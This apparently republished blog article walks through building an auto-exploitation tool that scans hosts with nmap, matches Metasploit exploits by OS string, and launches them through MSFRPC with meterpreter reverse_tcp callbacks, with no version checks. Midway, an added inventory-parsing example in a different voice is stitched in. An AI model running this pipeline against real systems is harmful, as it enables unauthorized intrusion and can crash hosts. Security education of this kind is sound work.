MandaloreQuest: An Offensive Journey


by David Evenden


What is MandaloreQuest?

My research on the topic of the AutoExploitation of targets initiated the development of MandaloreQuest, an auto-exploitation tool that is designed to throw exploits mapped to targets. This is designed to operate much in the same way Browser_AutoPwn works in Metasploit. I wanted to see if I could develop something that throws exploits at known targets identified from an NMAP scan.

Python-NMAP

I started with identifying targets by using the python-nmap module (imported as nmap). In the resulting Python program I used getopt to receive targets and ports, then sent them to nmap. Here I'm not using getopt, but I wanted to let you know so there was some clarity around how I was handling user input.


#using 3 spaces instead of /t
import nmap
TARGET = '192.0.2.0/24'   #placeholder; in the real program this comes from getopt
PORT = '22-445'           #placeholder port spec, or None if the user gave no port
nm = nmap.PortScanner()
#if a port is provided
if PORT:
   nm.scan(TARGET, PORT, arguments='-n -O -Pn')
#if a port is not provided
else:
   nm.scan(TARGET, arguments='-n -O -Pn')
print(nm.command_line()) #for education purposes
allhosts = nm.all_hosts()
#all_protocols() only exists per host (nm[i].all_protocols()) and just lists 'tcp'/'udp'; not actually helpful here

#Then I rotated through the hosts with a for loop.
for i in allhosts:
   print(nm[i].hostname())
   print(nm[i].state())
   print(nm[i].all_tcp()) #helpful gets all TCP open ports (no KeyError when a host has no tcp table)

   #in order to get OS data you must process the osmatch data
   #-O may return no match at all, so guard before indexing [0]
   if not nm[i]['osmatch'] or not nm[i]['osmatch'][0]['osclass']:
      continue
   osfamily = nm[i]['osmatch'][0]['osclass'][0]['osfamily']
   osgen = nm[i]['osmatch'][0]['osclass'][0]['osgen']
   target_os = '%s %s' % (osfamily, osgen)

   #alt option
   #some module target options might use the long name
   target_os = nm[i]['osmatch'][0]['name']

Before we move on, I have to show you how to capture each protocol.


#this goes inside the per-host for loop above, so i is the current host
protocols = []
#nm[i]['addresses'] holds the ipv4/mac keys; nm[i].all_protocols() lists the 'tcp'/'udp' tables
#(looping over every key of nm[i] and testing its length/type breaks on 'hostnames' and 'status')
ipaddr = nm[i]['addresses'].get('ipv4', i)
for p in nm[i].all_protocols():
   for t in nm[i][p]:
      protocol = nm[i][p][t]['name']
      protocols.append(protocol)
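
As an added example (not the article's code), here is the same parse the two loops above perform, written as plain functions over a dict shaped like python-nmap's `nm[host]` entry, with a constructed sample embedded so it runs without nmap installed. The point anyone doing authorized scanning cares about is the host that `-O` could not fingerprint: its `osmatch` list is empty, and indexing it with `[0]` raises an IndexError that takes the whole run down. Field names (`addresses`, `status`, `osmatch`, `osclass`, per-protocol port tables) follow what python-nmap emits; the sample addresses and services are made up.

```python
"""Normalise python-nmap host records into inventory rows.

Added example, not the article's code: it consumes a plain dict shaped like
the nm[host] entry python-nmap returns, so it runs offline on the constructed
sample below. Hosts with no osmatch, an empty osclass list, or no open ports
are handled instead of raising IndexError/KeyError.
"""

PROTOCOLS = ("tcp", "udp", "sctp", "ip")  # keys python-nmap uses for port tables


def os_guess(host):
    """Return (osfamily, osgen, long_name) from the most accurate osmatch,
    or ("", "", "") when nmap could not fingerprint the host."""
    matches = host.get("osmatch") or []
    if not matches:
        return "", "", ""
    best = max(matches, key=lambda m: int(m.get("accuracy", 0)))
    classes = best.get("osclass") or []
    family = classes[0].get("osfamily", "") if classes else ""
    gen = classes[0].get("osgen", "") if classes else ""
    return family, gen, best.get("name", "")


def open_services(host):
    """Return a sorted list of (proto, port, service_name) for ports reported open."""
    services = []
    for proto in PROTOCOLS:
        table = host.get(proto) or {}
        for port, info in table.items():
            if info.get("state") == "open":
                services.append((proto, int(port), info.get("name", "")))
    return sorted(services)


def inventory_row(host, fallback_ip=""):
    """Build one inventory record; fallback_ip is the scan key, used if
    the 'addresses' table has no ipv4 entry."""
    family, gen, long_name = os_guess(host)
    return {
        "ip": (host.get("addresses") or {}).get("ipv4", fallback_ip),
        "state": (host.get("status") or {}).get("state", "unknown"),
        "os_short": (family + " " + gen).strip(),   # e.g. "Windows XP"
        "os_long": long_name,                        # e.g. "Microsoft Windows XP SP3"
        "services": open_services(host),
    }


# Constructed sample shaped like python-nmap output (documentation-range IPs, not real scan data).
SAMPLE_HOSTS = {
    "192.0.2.10": {
        "addresses": {"ipv4": "192.0.2.10"},
        "status": {"state": "up", "reason": "user-set"},
        "tcp": {
            445: {"state": "open", "name": "microsoft-ds"},
            135: {"state": "open", "name": "msrpc"},
            23: {"state": "filtered", "name": "telnet"},   # not open, so not inventoried
        },
        "osmatch": [
            {"name": "Microsoft Windows XP SP3", "accuracy": "96",
             "osclass": [{"osfamily": "Windows", "osgen": "XP", "accuracy": "96"}]},
            {"name": "Microsoft Windows 2000 SP4", "accuracy": "90",
             "osclass": [{"osfamily": "Windows", "osgen": "2000"}]},
        ],
    },
    # A host -O could not fingerprint: osmatch is empty, which [0] indexing would crash on.
    "192.0.2.11": {
        "addresses": {"ipv4": "192.0.2.11"},
        "status": {"state": "up", "reason": "user-set"},
        "tcp": {22: {"state": "open", "name": "ssh"}},
        "osmatch": [],
    },
}


def build_inventory(hosts=SAMPLE_HOSTS):
    """One row per host, in address order."""
    return [inventory_row(rec, ip) for ip, rec in sorted(hosts.items())]


if __name__ == "__main__":
    for row in build_inventory():
        print(row)
```

With a live scan you would pass `{h: nm[h] for h in nm.all_hosts()}` to `build_inventory`; the accessor functions do not touch the scanner object, which is also what makes them easy to unit-test against canned records.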

Metasploit

Once the OS data and the protocol/port data have been obtained we can move into interacting with Metasploit. There are two parts here; the first is getting a list of exploits that might work against our target. So far my solution is sludgy and I don't have confidence that the exploits found will work very often. It appears that either the Metasploit dev folk are trying to make it hard to link these, or there are other factors preventing a more transparent link analysis of exploit-to-target relationships. Let's pursue this first one before we move on to the next.


import psycopg2, psycopg2.extras
psql_connect = "host='localhost' dbname='msf' user='msf' password='%pass%'"
msf_conn = psycopg2.connect(psql_connect)
#cursors come from the connection's cursor() method; DictCursor lets us index rows by column name
msf_cursor = msf_conn.cursor(cursor_factory=psycopg2.extras.DictCursor)


If you're using Kali, your msfdb password can be found here:


/usr/share/metasploit-framework/config/database.yml

If you're not using Kali, check the config folder in your Metasploit install path.

Target/Module Link Analysis

Once you have the connection established you can now run queries and collect potential operational exploits. First I set my query. This is a compound query that took a lot of DB searching to identify the links between the tables and the IDs.

Here are a few screenshots of the details of the tables. You can see the id and details_id are designed to match up.

(screenshot: module_details table)

(screenshot: module_targets table)

(screenshot: links against "windows xp")

Now we go on to use the OS data from before to identify exploits that could potentially work against our targets.



#remember this goes under the previous code and is performed for each protocol for each host
exploits = []
#module_targets.details_id is the foreign key to module_details.id (see the screenshots above)
#ILIKE with % wildcards gives the case-insensitive substring match the original regex-with-% never matched
#(in a Postgres regex '^' only anchors at the start of the string, so '%^...%' can't match anything);
#the OS string is bound as a query parameter instead of being formatted into the SQL text
query = ("select module_details.fullname, module_details.id, module_targets.details_id, module_targets.name "
         "from module_details, module_targets "
         "where module_details.id = module_targets.details_id and module_targets.name ilike %s")
msf_cursor.execute(query, ('%' + target_os + '%',))
msf_details = msf_cursor.fetchall()
for row in msf_details:
   exploit = row['fullname']
   for protocol in protocols:
      if protocol in exploit:
         if exploit not in exploits:
            exploits.append(exploit)

After we capture the exploits for that OS and protocol we can start launching exploits at targets. Here we are not diving into software and OS versions. We understand this makes the tool very dangerous and stupid, so we aren't releasing it to the public until we can make better determinations on software-to-exploit pairing. Our plan is to use the db connect options for Nessus and see if that works, Nessus of course being a very dangerous tool if not used properly.

Moving forward the initial difficulty here is learning how to launch exploits and receive callbacks without initiating the program from a msfconsole.

MSFRPC: Metasploit's API

Luckily for my use case there is an underlying API for Metasploit that allows users to interact remotely with a running MSF Console. Here you basically launch your own remote msfconsole with parameters that allow for remote connectivity. We used the MSFRPC module. We have to make a few changes to get it to work inside our code. You can find the msfrpc.py code here:

https://github.com/SpiderLabs/msfrpc

Once you have this imported you can start a shell, and set the stage for your msfconsole platform to run jobs and start listeners.


import subprocess, time
from msfrpc import Msfrpc   #msfrpc.py from the SpiderLabs repo linked above
msf_pass = '<msfrpc password>'   #placeholder; the original value did not survive extraction
#launch a separate msfconsole with the msfrpc plugin loaded so we can drive it remotely
#ServerHost=0.0.0.0 listens on every interface; 127.0.0.1 is enough when this script runs on the same box
subprocess.call(['gnome-terminal', '-x', 'msfconsole', '-x',
                 "load msfrpc ServerHost=0.0.0.0 ServerPort=55000 User=msf Pass='%s'" % msf_pass])
time.sleep(15) #give the gui shell time to open
client = Msfrpc({'port': 55000})   #must match ServerPort above; the module's default port differs
client.login('msf', msf_pass)      #same user/pass the plugin was loaded with
ConsoleDB = client.call('console.create')
console_id = ConsoleDB['id']

Once we've set the msfconsole stage, now we'll begin to run jobs and start listeners.


import socket
myip = socket.gethostbyname(socket.gethostname())
local_port = 8000
for exploit in exploits:
   #payload names are lowercase, so the nmap osfamily ("Windows") is lowered for the payload path
   command = """
   use %s
   set payload %s/meterpreter/reverse_tcp
   set rhost %s
   set lhost %s
   set lport %s
   set autorunscript multi_console_command -rc /surveyscripts/%s/survey.rc
   run -j
   """ % (exploit, osfamily.lower(), ipaddr, myip, local_port, osfamily)
   #console.write takes the console id and the text to type as two list elements
   client.call('console.write', [console_id, command])
   local_port += 1

And now we've started throwing exploits that might crash a system, because there's no validation around the OS version or the software version. We'll keep working on that, and if you have some ideas, let us know.

Hope you've enjoyed the journey.

-JM (@JediMammoth)


About the author

David Evenden is an experienced offensive security operator/analyst with 10 years of active work experience inside the Intelligence Community (IC). During his time inside the IC, he learned Persian Farsi, worked at NSA Red Team and was a member of an elite international team operating in conjunction with coalition forces to aid in the ongoing efforts in the Middle East.

While he currently works with an ISP and DHS to aid in the efforts to enhance the bidirectional sharing relationship between the US Government and Commercial entities, his passion is educating network administrators and security engineers on best practices when securing your network.

David currently holds Pentest+ and CySA certificates.


The article was originally published on author's LinkedIn profile: https://www.linkedin.com/pulse/mandalorequest-offensive-journey-david-evenden/


May 10, 2019


© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013